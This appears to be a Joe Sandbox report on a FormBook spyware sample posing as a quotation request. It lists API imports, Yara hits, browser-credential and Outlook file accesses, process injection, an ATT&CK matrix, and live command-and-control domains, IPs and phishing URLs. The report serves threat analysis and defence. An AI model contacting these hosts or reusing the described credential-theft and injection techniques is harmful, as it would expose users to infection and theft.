            Source: RFQ - HTS45785-24-0907I000.exe | Binary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_00472C3F GetUserNameW
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary

            Stealing of Sensitive Information

            Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000006.00000002.4160474621.0000000000850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.4161745255.0000000004530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.2168727858.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.4161610339.0000000003A20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.4161703996.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.2169121042.00000000037B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.2169602944.0000000004A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\write.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\write.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\write.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\write.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\write.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\write.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\write.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\write.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\write.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
            Source: RFQ - HTS45785-24-0907I000.exe | Binary or memory string: WIN_XP
            Source: RFQ - HTS45785-24-0907I000.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
            Source: RFQ - HTS45785-24-0907I000.exe | Binary or memory string: WIN_XPe
            Source: RFQ - HTS45785-24-0907I000.exe | Binary or memory string: WIN_VISTA
            Source: RFQ - HTS45785-24-0907I000.exe | Binary or memory string: WIN_7
            Source: RFQ - HTS45785-24-0907I000.exe | Binary or memory string: WIN_8

            Remote Access Functionality

            Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000006.00000002.4160474621.0000000000850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.4161745255.0000000004530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.2168727858.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.4161610339.0000000003A20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.4161703996.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.2169121042.00000000037B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.2169602944.0000000004A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 0_2_004652BE
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 0_2_00476619
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject, 0_2_0046CEF3
            MITRE ATT&CK Matrix (techniques listed per tactic column; a bracketed figure is the badge shown in that matrix cell, reproduced as extracted):

            • Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
            • Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
            • Initial Access: Valid Accounts [2]; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
            • Execution: Native API [2]; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
            • Persistence: DLL Side-Loading [1]; Valid Accounts [2]; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
            • Privilege Escalation: Exploitation for Privilege Escalation [1]; Abuse Elevation Control Mechanism [1]; DLL Side-Loading [1]; Valid Accounts [2]; Access Token Manipulation [21]; Process Injection [412]; Startup Items; Scheduled Task/Job; At
            • Defense Evasion: Disable or Modify Tools [1]; Deobfuscate/Decode Files or Information [1]; Abuse Elevation Control Mechanism [1]; Obfuscated Files or Information [3]; DLL Side-Loading [1]; Valid Accounts [2]; Virtualization/Sandbox Evasion [2]; Access Token Manipulation [21]; Process Injection [412]
            • Credential Access: OS Credential Dumping [1]; Input Capture [21]; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
            • Discovery: System Time Discovery [2]; Account Discovery [1]; File and Directory Discovery [2]; System Information Discovery [16]; Security Software Discovery [141]; Virtualization/Sandbox Evasion [2]; Process Discovery [3]; Application Window Discovery [11]; System Owner/User Discovery [1]
            • Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
            • Collection: Archive Collected Data [1]; Data from Local System [1]; Email Collection [1]; Input Capture [21]; Clipboard Data [3]; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
            • Command and Control: Ingress Tool Transfer [4]; Encrypted Channel [1]; Non-Application Layer Protocol [4]; Application Layer Protocol [4]; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
            • Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
            • Impact: System Shutdown/Reboot [1]; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            Behavior Graph ID: 1517661 | Sample: RFQ - HTS45785-24-0907I000.exe | Startdate: 25/09/2024 | Architecture: WINDOWS | Score: 100

            Start node (2):
            • DNS/IP: www.suarahati20.xyz; www.broomeorchard.xyz; 21 other IPs or domains
            • Signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 7 other signatures
            • www.broomeorchard.xyz: Performs DNS queries to domains with low reputation
            Process 10: RFQ - HTS45785-24-0907I000.exe [1], started from node 2
            • Signatures: Writes to foreign memory regions; Maps a DLL or memory area into another process
            Process 13: svchost.exe, started by process 10
            • Signatures: Maps a DLL or memory area into another process
            Process 16: TNPukQnytLH.exe, injected by process 13
            • Signatures: Found direct / indirect Syscall (likely to bypass EDR)
            Process 19: write.exe [13], started by process 16
            • Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
            Process 22: TNPukQnytLH.exe, injected by process 19
            • DNS/IP: www.broomeorchard.xyz 15.197.204.56, ports 49774, 49775, 49776, TANDEMUS, United States; www.93187.xyz 107.163.130.249, ports 49754, 49755, 49756, TAKE2US, United States; 9 other IPs or domains
            • Signatures: Found direct / indirect Syscall (likely to bypass EDR)
            Process 26: firefox.exe, started by process 19
            (Figures in square brackets are the node badges as extracted; see the legend above.)

            Antivirus detection (Source | Detection | Scanner | Label):
            • RFQ - HTS45785-24-0907I000.exe | 24% | ReversingLabs
            • RFQ - HTS45785-24-0907I000.exe | 26% | Virustotal
            • RFQ - HTS45785-24-0907I000.exe | 100% | Avira | HEUR/AGEN.1321671
            • RFQ - HTS45785-24-0907I000.exe | 100% | Joe Sandbox ML
            No Antivirus matches (dropped files, unpacked PE files, domains)
                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=write.exe, 00000006.00000003.2357840777.0000000007A1D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
IP | Domain | Country | ASN | ASN Name | Malicious
103.21.221.4 | tempatmudisini01.click | unknown | 9905 | LINKNET-ID-APLinknetASNID | true
199.192.21.169 | www.zenscape.top | United States | 22612 | NAMECHEAP-NETUS | true
52.187.43.73 | xzwp.g.zxy-cname.com | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | true
107.163.130.249 | www.93187.xyz | United States | 20248 | TAKE2US | true
198.252.106.191 | suarahati20.xyz | Canada | 20068 | HAWKHOSTCA | true
23.224.27.173 | hse6978h2.g.asiagoogleantiddoscdn.com | United States | 40065 | CNSERVERSUS | true
52.223.13.41 | www.insicilia.today | United States | 8987 | AMAZONEXPANSIONGB | true
43.154.104.247 | www.nmh6.site | Japan | 4249 | LILLY-ASUS | true
81.2.196.19 | asociacia.online | Czech Republic | 24806 | INTERNET-CZKtis238403KtisCZ | true
3.33.130.190 | o731lh.vip | United States | 8987 | AMAZONEXPANSIONGB | true
15.197.204.56 | www.broomeorchard.xyz | United States | 7430 | TANDEMUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1517661
Start date and time: 2024-09-25 05:34:05 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 28s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: RFQ - HTS45785-24-0907I000.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/2@13/11
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 54
• Number of non-executed functions: 300
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target TNPukQnytLH.exe, PID 4324 because it is empty
• Not all processes were analysed; the report is missing behavior information
• Report creation exceeded the maximum time and may be missing disassembly code information
• Report size exceeded the maximum capacity and may be missing disassembly code
Time | Type | Description
23:36:22 | API Interceptor | 9378160x Sleep call for process: write.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
103.21.221.4 | Purchase Order_ AEPL-2324-1126.exe | malicious | FormBook | www.tempatmudisini01.click/phdl/
103.21.221.4 | ncOLm62YLB.exe | malicious | FormBook | www.tempatmudisini01.click/lybf/
103.21.221.4 | SecuriteInfo.com.Win32.Malware-gen.10660.18305.exe | malicious | FormBook | www.tempatmudisini01.click/r9rj/
103.21.221.4 | SOLICITUD DE COTIZACIÓN - 6721000232111.exe | malicious | FormBook | www.tempatmudisini01.click/abla/
199.192.21.169 | Request for Quotation Hi-Tech Park Project 193200.exe | malicious | FormBook | www.zenscape.top/d8cw/
199.192.21.169 | DEBIT NOTE 01ST SEP 2024.exe | malicious | FormBook | www.selftip.top/85su/
199.192.21.169 | DCP11-83642024..exe | malicious | FormBook | www.urbanpulse.help/r50h/
199.192.21.169 | PROFOMA INVOICE SHEET.exe | malicious | FormBook | www.selftip.top/85su/
199.192.21.169 | SOLICITUD DE COTIZACIÓN - 6721000232111.exe | malicious | FormBook | www.zenscape.top/d8cw/
199.192.21.169 | file.exe | malicious | FormBook | www.urbanpulse.help/r50h/
199.192.21.169 | INV & BANK DETAILS LETTER.pdf.exe | malicious | FormBook | www.cenfresh.life/6iok/
107.163.130.249 | SOLICITUD DE COTIZACIÓN - 6721000232111.exe | malicious | FormBook | www.93187.xyz/jyeu/
107.163.130.249 | New Purchase Order.exe | malicious | FormBook | www.93187.xyz/jd6t/
198.252.106.191 | PO-000001488.exe | malicious | FormBook | www.suarahati20.xyz/tuad/
198.252.106.191 | PURCHASE ORDER-6350.exe | malicious | FormBook | www.suarahati20.xyz/tuad/

Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.insicilia.today | 2nd RFQ TECMARKQATAR PO33218_PDF.exe | malicious | FormBook | 52.223.13.41
www.insicilia.today | DCP11-83642024..exe | malicious | FormBook | 52.223.13.41
www.insicilia.today | SOLICITUD DE COTIZACIÓN - 6721000232111.exe | malicious | FormBook | 52.223.13.41
www.insicilia.today | SecuriteInfo.com.Win32.Malware-gen.24953.22588.exe | malicious | FormBook | 52.223.13.41
www.insicilia.today | file.exe | malicious | FormBook | 52.223.13.41
xzwp.g.zxy-cname.com | PO-000001488.exe | malicious | FormBook | 52.187.42.58
xzwp.g.zxy-cname.com | List of Items0001.doc.exe | malicious | FormBook, GuLoader | 13.76.137.44
xzwp.g.zxy-cname.com | Request for Quotation Hi-Tech Park Project 193200.exe | malicious | FormBook | 52.230.28.86
xzwp.g.zxy-cname.com | SOLICITUD DE COTIZACIÓN - 6721000232111.exe | malicious | FormBook | 13.76.139.81

Match | Associated Sample Name / URL | Detection | Threat Name | Context
TAKE2US | SOLICITUD DE COTIZACIÓN - 6721000232111.exe | malicious | FormBook | 107.163.130.249
TAKE2US | New Purchase Order.exe | malicious | FormBook | 107.163.130.249
TAKE2US | Solicitud de Cotización – Catálogo de Muestras2024.vbs | malicious | FormBook, GuLoader | 23.231.158.3
TAKE2US | quotation.exe | malicious | DarkTortilla, FormBook | 23.231.158.3
TAKE2US | 報價請求 - 樣本目錄.vbs | malicious | FormBook, GuLoader | 23.231.158.3
TAKE2US | Prośba o Wycena - Strony 4-6.vbs | malicious | FormBook, GuLoader | 23.231.158.3
TAKE2US | Contract.exe | malicious | FormBook | 23.231.158.3
TAKE2US | SHIPPING DETAILS.exe | malicious | FormBook | 23.231.158.3
TAKE2US | draft Proforma Invoice.exe | malicious | FormBook | 23.231.158.3
TAKE2US | SOA.exe | malicious | FormBook | 23.231.158.3
LINKNET-ID-APLinknetASNID | Purchase Order_ AEPL-2324-1126.exe | malicious | FormBook | 103.21.221.4
LINKNET-ID-APLinknetASNID | jNGMZWmt23.elf | malicious | Mirai | 139.37.141.74
LINKNET-ID-APLinknetASNID | ncOLm62YLB.exe | malicious | FormBook | 103.21.221.4
LINKNET-ID-APLinknetASNID | SecuriteInfo.com.Win32.Malware-gen.10660.18305.exe | malicious | FormBook | 103.21.221.4
LINKNET-ID-APLinknetASNID | SOLICITUD DE COTIZACIÓN - 6721000232111.exe | malicious | FormBook | 103.21.221.4
LINKNET-ID-APLinknetASNID | ppc.elf | malicious | Mirai, Moobot | 139.8.6.3
LINKNET-ID-APLinknetASNID | firmware.armv4l.elf | malicious | Unknown | 139.40.24.232
LINKNET-ID-APLinknetASNID | firmware.i686.elf | malicious | Unknown | 139.255.236.171
LINKNET-ID-APLinknetASNID | botx.arm.elf | malicious | Mirai | 139.16.204.145
LINKNET-ID-APLinknetASNID | botx.mpsl.elf | malicious | Mirai | 139.44.178.19
MICROSOFT-CORP-MSN-AS-BLOCKUS | http://updatefacebookmeta.weebly.com/ | malicious | Unknown | 51.104.148.203
MICROSOFT-CORP-MSN-AS-BLOCKUS | https://att-108291.weeblysite.com/ | malicious | HTMLPhisher | 150.171.27.10
MICROSOFT-CORP-MSN-AS-BLOCKUS | https://009-288-49.weeblysite.com/ | malicious | Unknown | 150.171.27.10
MICROSOFT-CORP-MSN-AS-BLOCKUS | https://shaw-105922.weeblysite.com/ | malicious | Unknown | 150.171.28.10
MICROSOFT-CORP-MSN-AS-BLOCKUS | https://att-2024-106815.weeblysite.com/ | malicious | Unknown | 150.171.27.10
MICROSOFT-CORP-MSN-AS-BLOCKUS | https://shaw-104345.weeblysite.com/ | malicious | Unknown | 150.171.28.10
MICROSOFT-CORP-MSN-AS-BLOCKUS | https://shaw-103414.weeblysite.com/ | malicious | HTMLPhisher | 150.171.27.10
MICROSOFT-CORP-MSN-AS-BLOCKUS | https://shaw-104492.weeblysite.com/ | malicious | Unknown | 150.171.28.10
MICROSOFT-CORP-MSN-AS-BLOCKUS | http://my-site-103283-105983.weeblysite.com/ | malicious | Unknown | 150.171.28.10
MICROSOFT-CORP-MSN-AS-BLOCKUS | http://vimuscle.vi/css/TB.html | malicious | Unknown | 150.171.28.10
NAMECHEAP-NETUS | https://lender-abang.pages.dev/ | malicious | Unknown | 162.213.255.57
NAMECHEAP-NETUS | https://telegram-message-8n5.pages.dev/ | malicious | Unknown | 162.213.255.57
NAMECHEAP-NETUS | https://arabuserseg.net/pp/xzw | malicious | Unknown | 199.188.205.199
NAMECHEAP-NETUS | https://ftyfyu-fae123.ingress-erytho.ewp.live/wp-content/plugins/kolydss/pages/region.php?lca | malicious | Unknown | 63.250.43.132
NAMECHEAP-NETUS | https://xmeonaena-fab1fa.ingress-comporellon.ewp.live/wp-content/plugins/nwesidem/pages/region.php | malicious | Unknown | 63.250.43.5
NAMECHEAP-NETUS | https://xmeonaena-fab1fa.ingress-comporellon.ewp.live/wp-content/plugins/nwesidem/ | malicious | Unknown | 63.250.43.5
NAMECHEAP-NETUS | https://blankonulldry-facc4a.ingress-florina.ewp.live/wp-content/plugins/Suspendisse%20vitae/pages/region.php | malicious | Unknown | 63.250.43.136
NAMECHEAP-NETUS | https://casacasa-fab1fa.ingress-comporellon.ewp.live/wp-content/plugins/nwesidem/pages/region.php?lca | malicious | Unknown | 63.250.43.5
NAMECHEAP-NETUS | https://mikaudtazes18-fab2ad.ingress-comporellon.ewp.live/wp-content/plugins/gyokeres23/pages/region.php | malicious | Unknown | 63.250.43.6
NAMECHEAP-NETUS | https://mikaudtazes18-fab2ad.ingress-comporellon.ewp.live/wp-content/plugins/gyokeres23/ | malicious | Unknown | 63.250.43.5
Process: C:\Windows\SysWOW64\write.exe
File Type: SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category: dropped
Size (bytes): 114688
Entropy (8bit): 0.9746603542602881
Encrypted: false
SSDEEP: 192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5: 780853CDDEAEE8DE70F28A4B255A600B
SHA1: AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256: 1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512: E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious: false
Reputation: high, very likely benign file
Process: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe
File Type: data
Category: dropped
Size (bytes): 287744
Entropy (8bit): 7.993452676608905
Encrypted: true
SSDEEP: 6144:llfSh67Ye/Bktomj1lCv4RDQl58TjG1fKeqghnUwTBVGpLox0+Q2/:vfS4/B09RvWf2wTe8b/
MD5: 3985CA4EE83BDBA8853B1D4D515E850D
SHA1: DEA7C6DA6980BD6658CB8EC63EB01D4BDE0597E5
SHA-256: 96054FC5FA51168E440AC6C7B788145DCEB2A326B56C8F607A7CEA9A6DCB7EAA
SHA-512: C6F1424D795904BFE601E4B39E58E074BBF2306AEC32F4F71CF22D97232C37E875530E004F81BF274511040B64A8A2B8D9C21A5E92B1EB93F45A1023E68001A1
Malicious: false
Reputation: low
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.539586336371795
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: RFQ - HTS45785-24-0907I000.exe
File size: 1'360'461 bytes
MD5: 8cd57235a1ba838df14c6a67ad2048d0
SHA1: 4fed67f0abcef3c4327774b1d06bf7cf98684db9
SHA256: b0d625e9b21d2f7373775bfeac6ccf6cf362e24d79a61dd4829a82a1595c27f6
SHA512: a0cb306340ac8660dc447e8798c03818af8ae1f7cdd7b9d760ad49aae7cbdb2b07da265ee98fd152f1d6625ebb32dff220101c2cf3824aed2d54934f8a4d0be2
SSDEEP: 24576:uRmJkcoQricOIQxiZY1iaC3VmKp23kCkug159Avtu9BPXpRCfmGG:7JZoQrbTFZY1iaC4eugD9AOZXLCfmGG
TLSH: CB55E121F9D68036C2B323B19E7FF769963D79360336D29727C82D215EA05416B2A733
Icon Hash: 1733312925935517
Entrypoint: 0x4165c1
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics: TERMINAL_SERVER_AWARE
Time Stamp: 0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 0
File Version Major: 5
File Version Minor: 0
Subsystem Version Major: 5
Subsystem Version Minor: 0
Import Hash: d3bf8a7746a8d1ee8f6e5960c3f69378
Programming Language:
• [ C ] VS2010 SP1 build 40219
• [C++] VS2010 SP1 build 40219
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
• [ASM] VS2010 SP1 build 40219
• [RES] VS2010 SP1 build 40219
• [LNK] VS2010 SP1 build 40219
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8d41c | 0x154 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xab000 | 0x9328 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x82000 | 0x844 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8061c | 0x80800 | 61ffce4768976fa0dd2a8f6a97b1417a | False | 0.5583182605787937 | data | 6.684690148171278 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x82000 | 0xdfc0 | 0xe000 | 0354bc5f2376b5e9a4a3ba38b682dff1 | False | 0.36085728236607145 | data | 4.799741132252136 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x90000 | 0x1a758 | 0x6800 | 8033f5a38941b4685bc2299e78f31221 | False | 0.15324519230769232 | data | 2.1500715391677487 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
